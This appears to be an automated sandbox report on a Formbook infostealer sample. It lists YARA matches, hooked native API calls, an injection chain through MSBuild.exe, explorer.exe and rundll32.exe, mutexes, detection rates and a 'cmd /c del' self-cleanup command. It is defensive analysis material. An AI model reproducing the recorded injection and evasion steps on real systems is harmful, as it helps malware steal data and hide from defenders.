          Source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeCode function: 1_2_019494A8
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeCode function: 1_2_0194C148
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeCode function: 1_2_0194A758
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0041E1DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0041E5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00402D8C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0041E5BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00409E4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00409E50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0041D6C5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F0B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F14120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EFF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F0841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F0D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F16E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A520A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF20A8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A3B090
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF28EC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE1002
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A3841F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A52581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A3D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF25DD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A20D20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A44120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A2F900
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF2D07
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF1D55
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF22AE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF2EF7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A46E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5EBB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF1FF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AEDBD2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF2B28
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00ABE1DD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00ABE5BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00AA2D8C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00AA2D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00ABE5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00ABD6C5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00AA9E4C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00AA9E50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00AA2FB0
          Source: C:\Windows\explorer.exeCode function: 30_2_05959232
          Source: C:\Windows\explorer.exeCode function: 30_2_0595C5CD
          Source: C:\Windows\explorer.exeCode function: 30_2_05956912
          Source: C:\Windows\explorer.exeCode function: 30_2_05950D02
          Source: C:\Windows\explorer.exeCode function: 30_2_05953B30
          Source: C:\Windows\explorer.exeCode function: 30_2_05953B32
          Source: C:\Windows\explorer.exeCode function: 30_2_0594F082
          Source: C:\Windows\explorer.exeCode function: 30_2_05958036
          Source: C:\Windows\explorer.exeCode function: 42_2_05566232
          Source: C:\Windows\explorer.exeCode function: 42_2_05563912
          Source: C:\Windows\explorer.exeCode function: 42_2_0555DD02
          Source: C:\Windows\explorer.exeCode function: 42_2_05560B32
          Source: C:\Windows\explorer.exeCode function: 42_2_05560B30
          Source: C:\Windows\explorer.exeCode function: 42_2_055695CD
          Source: C:\Windows\explorer.exeCode function: 42_2_05565036
          Source: C:\Windows\explorer.exeCode function: 42_2_0555C082
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00EFB150 appears 32 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04A2B150 appears 35 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0041A350 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0041A400 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0041A480 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0041A530 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0041A34A NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0041A3FD NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0041A3A2 NtCreateFile,NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F398F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F395D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F397A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F398A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F3B040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F399D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F3A3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F395F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F3AD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F396D0 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39FE0 NtCreateMutant,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F3A770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F39730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F3A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A6B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A6AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69560 NtWriteFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A6A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A6A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A69770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A6A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00ABA350 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00ABA480 NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00ABA400 NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00ABA530 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00ABA3A2 NtCreateFile,NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00ABA3FD NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00ABA34A NtCreateFile,
          Source: C:\Windows\explorer.exeCode function: 30_2_05959232 NtCreateFile,
          Source: C:\Windows\explorer.exeCode function: 42_2_05567E12 NtProtectVirtualMemory,
          Source: C:\Windows\explorer.exeCode function: 42_2_05566232 NtCreateFile,
          Source: C:\Windows\explorer.exeCode function: 42_2_05567E0A NtProtectVirtualMemory,
          Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 98%
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.340630386.00000000032D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs H4vBtZsi8xAKaMm.exe
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs H4vBtZsi8xAKaMm.exe
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344847542.0000000007B70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs H4vBtZsi8xAKaMm.exe
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.339243084.0000000000F68000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilename760pQ.exe@ vs H4vBtZsi8xAKaMm.exe
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs H4vBtZsi8xAKaMm.exe
          Source: H4vBtZsi8xAKaMm.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: H4vBtZsi8xAKaMm.exeVirustotal: Detection: 65%
          Source: H4vBtZsi8xAKaMm.exeMetadefender: Detection: 47%
          Source: H4vBtZsi8xAKaMm.exeReversingLabs: Detection: 85%
          Source: H4vBtZsi8xAKaMm.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe "C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe"
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\explorer.exe explorer.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\explorer.exe explorer.exe
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{660b90c8-73a9-4b58-8cae-355b7f55341b}\InProcServer32
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\H4vBtZsi8xAKaMm.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@8/3
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeMutant created: \Sessions\1\BaseNamedObjects\lPuSWPcuIceRXCxevPdXbrCb
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_01
          Source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
          Source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
          Source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
          Source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
          Source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: *.sln
          Source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: MSBuild MyApp.csproj /t:Clean
          Source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: /ignoreprojectextensions:.sln
          Source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\explorer.exe
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: H4vBtZsi8xAKaMm.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: H4vBtZsi8xAKaMm.exeStatic file information: File size 1304576 > 1048576
          Source: H4vBtZsi8xAKaMm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: H4vBtZsi8xAKaMm.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x134400
          Source: H4vBtZsi8xAKaMm.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: H4vBtZsi8xAKaMm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\jpRHjxHGRl\src\obj\Debug\760pQ.pdb source: H4vBtZsi8xAKaMm.exe
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 0000000E.00000002.401789434.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000003.338982256.0000000000D30000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.401925029.0000000000FEF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.800187501.0000000004B1F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.799896535.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.402164809.00000000046D0000.00000004.00000800.00020000.00000000.sdmp
